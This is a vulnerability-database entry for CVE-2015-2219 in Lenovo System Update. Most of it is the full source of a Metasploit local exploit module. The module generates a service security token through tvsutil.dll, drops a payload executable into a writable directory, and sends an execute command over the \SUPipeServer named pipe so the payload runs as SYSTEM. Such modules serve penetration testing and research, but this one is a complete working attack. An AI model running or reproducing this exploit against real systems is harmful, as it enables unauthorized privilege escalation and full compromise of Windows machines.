Lucene search

Lenovo System Update Privilege Escalation

🗓️ 14 May 2015 22:03:36Reported by Michael Milvich, Sofiane Talmat, h0ng10Type

Lenovo System Update Privilege Escalation. Named pipe \SUPipeServer allows normal users to interact with System update service. It can execute arbitrary commands as SYSTEM if valid security token is provided. Token can be generated by calling GetSystemInfoData function in DLL tvsutil.dll. System Update can be started/stopped using Executable ConfigService.exe

Reporter	Title	Published	Views	Family All 10
Cvelist	CVE-2015-2219	12 May 201519:00	–	cvelist
Prion	Design/Logic Flaw	12 May 201519:59	–	prion
0day.today	Lenovo System Update - Privilege Escalation Exploit	23 Mar 201700:00	–	zdt
0day.today	Lenovo System Update Privilege Escalation Exploit	23 May 201500:00	–	zdt
Packet Storm	Lenovo System Update Privilege Escalation	23 May 201500:00	–	packetstorm
Exploit DB	Lenovo System Update - Local Privilege Escalation (Metasploit)	12 Apr 201500:00	–	exploitdb
NVD	CVE-2015-2219	12 May 201519:59	–	nvd
CVE	CVE-2015-2219	12 May 201519:59	–	cve
Tenable Nessus	Lenovo System Update < 5.06.0034 Multiple Vulnerabilities	21 May 201500:00	–	nessus
Kaspersky	KLA10572 Multiple vulnerabilities in Lenovo System Update	14 Apr 201500:00	–	kaspersky

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  include Msf::Exploit::EXE
  include Msf::Post::File
  include Msf::Exploit::FileDropper
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Services

  Rank = ExcellentRanking

  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => 'Lenovo System Update Privilege Escalation',
          'Description' => %q{
            The named pipe, \SUPipeServer, can be accessed by normal users to interact with the
            System update service. The service provides the possibility to execute arbitrary
            commands as SYSTEM if a valid security token is provided. This token can be generated
            by calling the GetSystemInfoData function in the DLL tvsutil.dll. Please, note that the
            System Update is stopped by default but can be started/stopped calling the Executable
            ConfigService.exe.
          },
          'License' => MSF_LICENSE,
          'Author' => [
            'Michael Milvich', # vulnerability discovery, advisory
            'Sofiane Talmat',  # vulnerability discovery, advisory
            'h0ng10'           # Metasploit module
          ],
          'Arch' => ARCH_X86,
          'Platform' => 'win',
          'SessionTypes' => ['meterpreter'],
          'DefaultOptions' => {
            'EXITFUNC' => 'thread'
          },
          'Targets' => [
            [ 'Windows', {} ]
          ],
          'Payload' => {
            'Space' => 2048,
            'DisableNops' => true
          },
          'References' => [
            ['OSVDB', '121522'],
            ['CVE', '2015-2219'],
            ['URL', 'http://www.ioactive.com/pdfs/Lenovo_System_Update_Multiple_Privilege_Escalations.pdf']
          ],
          'DisclosureDate' => '2015-04-12',
          'DefaultTarget' => 0,
          'Compat' => {
            'Meterpreter' => {
              'Commands' => %w[
                stdapi_railgun_api
              ]
            }
          }
        }
      )
    )

    register_options([
      OptString.new('WritableDir', [false, 'A directory where we can write files (%TEMP% by default)']),
      OptInt.new('Sleep', [true, 'Time to sleep while service starts (seconds)', 4]),
    ])
  end

  def check
    unless session.platform == 'windows'
      return Exploit::CheckCode::Safe
    end

    svc = service_info('SUService')
    if svc && svc[:display] =~ /System Update/
      vprint_good("Found service '#{svc[:display]}'")
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end

  def write_named_pipe(pipe, command)
    invalid_handle_value = 0xFFFFFFFF

    r = session.railgun.kernel32.CreateFileA(pipe, 'GENERIC_READ | GENERIC_WRITE', 0x3, nil, 'OPEN_EXISTING', 'FILE_FLAG_WRITE_THROUGH | FILE_ATTRIBUTE_NORMAL', 0)
    handle = r['return']

    if handle == invalid_handle_value
      fail_with(Failure::NoTarget, "#{pipe} named pipe not found")
    else
      vprint_good("Opended #{pipe}! Proceeding...")
    end

    begin
      # First, write the string length as Int32 value
      w = client.railgun.kernel32.WriteFile(handle, [command.length].pack('l'), 4, 4, nil)

      if w['return'] == false
        print_error('The was an error writing to pipe, check permissions')
        return false
      end

      # Then we send the real command
      w = client.railgun.kernel32.WriteFile(handle, command, command.length, 4, nil)

      if w['return'] == false
        print_error('The was an error writing to pipe, check permissions')
        return false
      end
    ensure
      session.railgun.kernel32.CloseHandle(handle)
    end
    true
  end

  def get_security_token(lenovo_directory)
    unless client.railgun.get_dll('tvsutil')
      client.railgun.add_dll('tvsutil', "#{lenovo_directory}\\tvsutil.dll")
      client.railgun.add_function('tvsutil', 'GetSystemInfoData', 'DWORD', [['PWCHAR', 'systeminfo', 'out']], nil, 'cdecl')
    end

    dll_response = client.railgun.tvsutil.GetSystemInfoData(256)

    dll_response['systeminfo'][0, 40]
  end

  def config_service(lenovo_directory, option)
    cmd_exec("#{lenovo_directory}\\ConfigService.exe #{option}")
  end

  def exploit
    if is_system?
      fail_with(Failure::NoTarget, 'Session is already elevated')
    end

    su_directory = service_info('SUService')[:path][1..-16]
    print_status('Starting service via ConfigService.exe')
    config_service(su_directory, 'start')

    print_status('Giving the service some time to start...')
    Rex.sleep(datastore['Sleep'])

    print_status('Getting security token...')
    token = get_security_token(su_directory)
    vprint_good("Security token is: #{token}")

    if datastore['WritableDir'].nil? || datastore['WritableDir'].empty?
      temp_dir = get_env('TEMP')
    else
      temp_dir = datastore['WritableDir']
    end

    print_status("Using #{temp_dir} to drop the payload")

    begin
      cd(temp_dir)
    rescue Rex::Post::Meterpreter::RequestError
      fail_with(Failure::BadConfig, "Failed to use the #{temp_dir} directory")
    end

    print_status('Writing malicious exe to remote filesystem')
    write_path = pwd
    exe_name = "#{rand_text_alpha(rand(10..19))}.exe"

    begin
      write_file(exe_name, generate_payload_exe)
      register_file_for_cleanup("#{write_path}\\#{exe_name}")
    rescue Rex::Post::Meterpreter::RequestError
      fail_with(Failure::Unknown, "Failed to drop payload into #{temp_dir}")
    end

    print_status('Sending Execute command to update service')

    begin
      write_res = write_named_pipe('\\\\.\\pipe\\SUPipeServer', "/execute #{exe_name} /arguments /directory #{write_path} /type COMMAND /securitycode #{token}")
    rescue Rex::Post::Meterpreter::RequestError
      fail_with(Failure::Unknown, 'Failed to write to pipe')
    end

    unless write_res
      fail_with(Failure::Unknown, 'Failed to write to pipe')
    end

    print_status('Stopping service via ConfigService.exe')
    config_service(su_directory, 'stop')
  end
end

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

14 May 2015 22:36Current

7.6High risk

Vulners AI Score7.6

CVSS27.2